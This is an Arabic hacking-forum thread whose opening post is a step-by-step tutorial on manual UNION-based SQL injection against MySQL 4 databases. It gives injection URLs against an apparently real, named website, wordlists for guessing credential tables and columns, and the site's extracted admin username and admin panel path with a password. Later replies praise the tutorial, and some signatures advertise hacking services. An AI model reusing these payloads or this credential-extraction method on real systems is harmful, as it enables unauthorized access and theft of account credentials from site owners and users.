كيفية التعامل مع الاصدار الرابع في ثغرات الحقن

كيفية التعامل مع الاصدار الرابع في ثغرات الحقن


صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 10 من 13

الموضوع: كيفية التعامل مع الاصدار الرابع في ثغرات الحقن

  1. #1

    Come كيفية التعامل مع الاصدار الرابع في ثغرات الحقن

    السلام عليكم ورحمة الله وبركاتة

    اول شي مبروك على رجعة الموقع



    طيب موضوعنا اليوم شرح عن كيفية التعامل مع الاصدار الرابع "4" في ثغرات الحقن

    جميعنا نعرف ان الاصدار الرابع في الحقن صعب جدا وكله تخمين بتخمين واذا بدك تستغل يدوي يمكن تزهق حياتك وانتي تخمن
    لذالك الالغلب اصبح يستخدم البرامج للاستغلال
    والبعض او عشاق ثغرات الحقن الي بستغلو يدوي بحبو يعرفو طريقه التعامل مع هذا الاصدار (الاصدار الرابع)
    والان ساشرح الطريقه + تطبيق على موقع

    نبدء على بركة الله..

    الموقع الذي سنطبق عليه الشرح عدد اعمدتة 3 وايضا العامود المصاب هو الثالث فقط


    كود:
    http://www.lawchart.com/index.php?id=-3+union+select+1,2,3--

    نحذف رقم 3 ونضع بداله كلمة version() لمعرفة اصدار القاعدة ,, يعني يصير الامر هكذا..

    كود:
    http://www.lawchart.com/index.php?id=-3+union+select+1,2,version()--

    ظهر معنى الاصدار الرابع " 4.1.22-log "

    الان نضيف عليها الامر +from يعني يصبح الرابط هكذا.
    كود:
    http://www.lawchart.com/index.php?id=-3+union+select+1,2,3+from--


    ونجرب نضيف احد هذة الكلمات ( تابع اسا بتفهم كل شي .. )

    member
    admin
    user
    users
    accounts
    std_users
    myuser
    sys_user
    mysql.db ++user
    main
    sf_user
    tt_user
    mo_user
    mos_user
    login
    mysql.user
    mysql.users
    admin_login
    jos_users
    jos_session
    wp_users
    bg_users
    usuarios
    login_username
    user_login
    admin_sections


    نجربهن ونشوف اي وحدي منهن الصحيحه

    ما هذة الكلمات ؟؟ لماذا!؟
    هذة الكلمات هي من الممكن ان تكون اسم الجدول الي يوجد بداخله اليوزر والباسورد
    يعني هذه الكلمات هي اسماء الجداول الي فيها ملف اليوزر والباسورد (ممكن يكونو هني وممكن لا )

    ولكن كيف سأعرف ان هذا اسم الجدول صحيح ام غير صحيح ؟؟
    على سبيل المثال عندما تضع كلمة member او اي كلمة موجودة بالاعلى..

    كود:
    http://www.lawchart.com/index.php?id=-3+union+select+1,2,3+from+member--

    اذا ظهر معك خطء ورجعت الصفحة خربت من هنا اعرف ان هذة الكلمه غير صحيحه وما في منو هاد الجدول ,,, حاول تجرب على كلمة ثانيه
    واذا لم يظهر معك الخطء ولم يتغير شي بالصفحة فهذا هو الجدول الي بداخله يوجد ملف اليوزر والباسورد

    وبالموقع الي منطبق عليه زبطت معنا كلمة users يعني هيك يصير الرابط
    كود:
    http://www.lawchart.com/index.php?id=-3+union+select+1,2,3+from+users--


    احنا هيك تخطينا اول خطوة من التخمين وضل علينا نخمن اسم ملف اليوزر واسم ملف الباسورد

    لكن كيف ستحدث هذة؟؟
    نحن قلنا ان العامود المصاب هو العامود الثالث يعني التخمين رح يكون على العامود الثالث

    لتخمين اليوزر


    login
    user
    username
    users
    username
    user_name
    admin
    adminlogin
    loginmember
    membername
    admin_lastname
    lastname
    fristname
    uname
    name
    +user_login
    aid
    id
    user_sections
    user_username
    user_id
    user_first_name

    ----------------
    لتخمين الباسورد


    userPass
    password
    admin_password
    pass
    passwd
    pwd
    user_pass
    user_password



    وعلى الموقع الي منطبق عليه زبط معنا username,password
    يعني لو بدنا نطلع اليوزر منحط بدل الرقم 3 "username" ..يصير الرابط هيك..
    كود:
    http://www.lawchart.com/index.php?id=-3+union+select+1,2,username+from+users--

    طيب حلوو طلع لنا اليوزرنيم:- admin

    الان نطلع الباسورد ,, نستبدل كلمة username بكلمة password يعني الرابط بصير هيك
    كود:
    http://www.lawchart.com/index.php?id=-3+union+select+1,2,password+from+users--

    تمام طلع لنا الباسورد:- [email protected]



    والان تفضلو اليوزر والباسورد ولوحة تحكم الموقع


    http://www.lawchart.com/admin/

    user: admin
    pass: [email protected]




    اتمنى ان اكون قد افدتكم وساعدتكم ولو بشيء بسيط
    تحياتي
    اخوكم QtRoNiX FoX
    التعديل الأخير تم بواسطة QtRoNiX FoX ; 12-22-2012 الساعة 10:43 PM

    لا تترك صلاتك ابداً
    فهناك ألملايين تحت ألقبور يتمنون لو تعود بهم الحياة
    لـ يسجدو لو سجدة واحدة !



    اللهم صل وسلم وبارك على سيدنا محمد وعلى اله وصحبه اجمعين

    أستغفر الله العظيم الذي لا إله إلا هو الحي القيوم وأتوب إليه

  2. #2

    افتراضي رد: كيفية التعامل مع الاصدار الرابع في ثغرات الحقن

    شكرا لك
    مميز والله
    تقبل مروري المتواضع
    سأترك الوحة للاعظاء المبتدئين
    نريد انكس جميل اوك
    تقبل مروري المتواضع اخي
    بارك الله فيك
    ومبروووووك عودة الموقع

    *
    فمن اعتدى عليكم فاعتدو عليه بمثل ماعتدى عليكم واعدو له ما استطعتم من قوة وسلاح

    *فا اذا غامرت في شرف مروم فلا تقنع بما دون النجوم*

    [COLOR="#A52A2A"]فأقسم بالله العلي العظيم انني لن أخترق عربيا مسلما بعد اليوم [SIGPIC]

  3. #3

    افتراضي رد: كيفية التعامل مع الاصدار الرابع في ثغرات الحقن

    +تم التقييم
    لاتحرمنا جديدك اخي

    *
    فمن اعتدى عليكم فاعتدو عليه بمثل ماعتدى عليكم واعدو له ما استطعتم من قوة وسلاح

    *فا اذا غامرت في شرف مروم فلا تقنع بما دون النجوم*

    [COLOR="#A52A2A"]فأقسم بالله العلي العظيم انني لن أخترق عربيا مسلما بعد اليوم [SIGPIC]

  4. #4

    افتراضي رد: كيفية التعامل مع الاصدار الرابع في ثغرات الحقن

    اهلين اخي صلاح ولا تحرمنا من طلاتك

    بالتوفيق
    التعديل الأخير تم بواسطة QtRoNiX FoX ; 08-21-2012 الساعة 02:27 PM

  5. #5

    افتراضي رد: كيفية التعامل مع الاصدار الرابع في ثغرات الحقن

    شكرا لك اخي
    هاذا شرف الي

    *
    فمن اعتدى عليكم فاعتدو عليه بمثل ماعتدى عليكم واعدو له ما استطعتم من قوة وسلاح

    *فا اذا غامرت في شرف مروم فلا تقنع بما دون النجوم*

    [COLOR="#A52A2A"]فأقسم بالله العلي العظيم انني لن أخترق عربيا مسلما بعد اليوم [SIGPIC]

  6. #6

    افتراضي رد: كيفية التعامل مع الاصدار الرابع في ثغرات الحقن

    مشكووور عالشرح الجميل
    لا تحرمنا من جديدك

    يرجى الدعاء لسوريا

  7. #7

    افتراضي رد: كيفية التعامل مع الاصدار الرابع في ثغرات الحقن

    تحيااااااااتي لك
    الأخطاء ليست فن ولكن فن اختراع


  8. #8

    افتراضي رد: كيفية التعامل مع الاصدار الرابع في ثغرات الحقن

    والله العظيم اني كنت مستصعب الثغره هاي كلها بس والله فهمتها من درسك
    يا اخي عنجد شكرا الك شكرا جزيلا
    ولا تحرمنا جديدك

  9. #9

    افتراضي رد: كيفية التعامل مع الاصدار الرابع في ثغرات الحقن

    مشكؤؤر
    يعطيك العآفية
    إخترآق أجهزة _ إيميلات 100 %
    تشفير _ هيكس _ تلغيم 100 %
    اندكسات _ فرونت بيج 100 %
    إختراق مواقــع 30 %

    #
    تم إعتـزال إختراق الأجهزة والتشفير

    twitter : Ss_pc3

  10. #10

    افتراضي رد: كيفية التعامل مع الاصدار الرابع في ثغرات الحقن

    مشكووور يا بطل ♥

    *ومارميت اذ رميت ولاكن الله رمى *

    boss-h@cker

صفحة 1 من 2 12 الأخيرةالأخيرة

المواضيع المتشابهه

  1. الدرس الخامس : حقن الاصدار الرابع ... استخراج اليوزر والباس
    بواسطة e . V . E . L في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 7
    آخر مشاركة: 10-16-2011, 08:00 AM
  2. درس الاحتراف في sql مع حقن الاصدار الرابع
    بواسطة Dr.BiLLi.HaCkEr في المنتدى منتدى إختراق المنتديات
    مشاركات: 12
    آخر مشاركة: 10-16-2011, 01:30 AM
  3. مشاركات: 10
    آخر مشاركة: 02-03-2011, 06:55 PM
  4. كيفية التعامل بين المشرف/ـه والعضو/ـه ؟! هام جـــــدا
    بواسطة OB§CURE في المنتدى المنتدى العام
    مشاركات: 9
    آخر مشاركة: 11-12-2010, 07:47 PM
  5. ادوات البيرل الاصدار الرابع 2010 هنا ....
    بواسطة SQL HEX في المنتدى قسم الثغرات
    مشاركات: 2
    آخر مشاركة: 05-18-2010, 12:19 PM

الكلمات الدلالية لهذا الموضوع

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •